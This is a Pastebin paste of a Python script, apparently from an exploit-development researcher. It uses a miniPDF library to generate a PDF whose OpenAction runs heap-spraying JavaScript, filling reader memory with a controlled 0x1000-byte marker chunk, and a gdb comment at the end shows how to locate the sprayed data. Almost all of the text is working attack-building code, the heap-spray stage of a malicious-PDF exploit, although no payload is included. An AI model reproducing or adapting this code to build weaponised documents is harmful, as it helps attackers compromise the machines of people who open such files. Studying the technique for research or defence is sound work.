Advertisement
Guest User

feliam

a guest
Feb 6th, 2010
897
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.12 KB | None | 0 0
  1. ##########################################################################
  2. ####      Felipe Andres Manzano * felipa.andres.manzano@gmail.com     ####
  3. ##########################################################################
  4. ## Add a heap spraying javascript to the document as OpenAction putting
  5. ## the js is in a potentialy 'filtered' Stream.
  6. from miniPDF.miniPDF import *
  7.  
  8. #Auxiliar to generate the unescape JS thingy
  9. def _toJS(s):
  10.     if type(s) in set([long, int]) :
  11.         s = struct.pack("<L",s)
  12.     assert len(s) % 2 == 0
  13.     return "unescape('%s')"%("".join(["%u"+"".join([ "%02x%02x"%(ord(s[i*2+1]),ord(s[i*2]))]) for i in range (0,len(s)/2)]))
  14.    
  15. #The document
  16. doc = PDFDoc()
  17.  
  18. #no-contents
  19. contents=  PDFStream(''' ''')
  20.  
  21. #page
  22. page = PDFDict()
  23. page.add("Type",PDFName("Page"))
  24. page.add("Contents", PDFRef(contents))
  25.  
  26. #pages
  27. pages = PDFDict()
  28. pages.add("Type", PDFName("Pages"))
  29. pages.add("Kids", PDFArray([PDFRef(page)]))
  30. pages.add("Count", PDFNum(1))
  31.  
  32. #catalog
  33. catalog = PDFDict()
  34. catalog.add("Type", PDFName("Catalog"))
  35. catalog.add("Pages", PDFRef(pages))
  36.  
  37. #The spraying js
  38. js = '''
  39. var slide_size=0x100000;
  40. var size = 300;      
  41. var x = new Array(size);
  42. var chunk = %%minichunk%%;
  43.  
  44. while (chunk.length <= slide_size/2)
  45.            chunk += chunk;
  46.  
  47. for (i=0; i < size; i+=1) {
  48.        id = ""+i;
  49.        x[i]= chunk.substring(4,slide_size/2-id.length-20)+id;
  50. }
  51.            
  52. '''
  53. #And we put in the controled minichunk
  54. # The will be something like "<<<<AAAAAAAAAAAA...AAAAAAAAAAAAAAAAA>>>>"
  55. # With total length = 0x1000
  56. js = js.replace('%%minichunk%%', _toJS('<<<<'+'A'*(0x1000-8)+'>>>>'))
  57.  
  58. #Add OpenAction javascript to the Document
  59. jsStream = PDFStream(js)
  60. doc.add(jsStream)
  61.  
  62. #set the OpenAction of the document
  63. actionJS = PDFDict()
  64. actionJS.add("S", PDFName("JavaScript"))
  65. actionJS.add("JS",PDFRef(jsStream))
  66. doc.add(actionJS)
  67. catalog.add("OpenAction", PDFRef(actionJS))
  68.  
  69. #add the rest of the objects to the doc
  70. doc.add([catalog,pages,page,contents])
  71. #the catalog is the root object
  72. doc.setRoot(catalog)
  73.  
  74. #renter it to stdout
  75. print doc
  76.  
  77. #(gdb) x/20x 0xb0000000+0x1000*x +3*4
  78.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement